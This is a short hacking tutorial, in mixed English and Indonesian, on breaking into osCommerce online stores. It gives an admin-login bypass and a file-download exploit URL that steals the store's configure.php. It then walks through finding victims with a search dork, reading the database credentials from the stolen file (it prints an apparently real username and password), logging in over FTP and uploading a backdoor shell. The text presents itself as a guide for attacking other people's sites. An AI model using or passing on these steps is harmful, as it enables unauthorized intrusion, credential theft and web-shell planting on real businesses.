# ByPass Page Admin :
You can use this Trick if admin folder not protected by .htaccess
if you Want to explore admin page without login. You can use /login.php behind the name of the file
Example :
http://[site]/admin/backup.php/login.php
or
http://[site]/admin/file_manager.php/login.php
Demo :
http://server/store/admin/file_manager.php/login.php
You can See all file in Directory Oscommerce.. haha ;)
and you can download all file with tRick above
# File Disclosure :
in : admin/file_manager.php/login.php?action=download&filename=
Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
ok, sekarang kita cari targetnya dgn dork "Powered by osCommerce" tanpa tanda petik.
contoh http://target/catalog/
nah, kita cari dulu nie admin page nya , jadinya nah, http://target/catalog/admin/login.php ketemu deh...
sekarang, kita pake exploitnya jadinya : http://target/catalog/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php nah kita mendapatkan configure.php, lsg aja deh kita download
selanjutnya, setelah kita download kita buka menggunakan notepad ato yg laen deh, nah itu tampak deh, kita coba dl masuk ke database tanpa masuk ke adminnya dgn yg kita dapatkan,
define('DB_SERVER_USERNAME', 'laurent');
define('DB_SERVER_PASSWORD', 'UQzlZ0vrHEiu');
habis kita dptkan yg kyk gitu, marilah kita buka melalui FTP, di sini saya menggunakan FileZila,
alhamdulillah sukses :lega: , marilah kita upload backdoor kita, biasanya sih di public_html, tp dsini saya upload di httpdocs, setelah success upload backdoor, lalu kita cek.
http://target/shell.php
oke trnyata sudah terpasang, monggo silakan di lanjut pembantaiannya॥
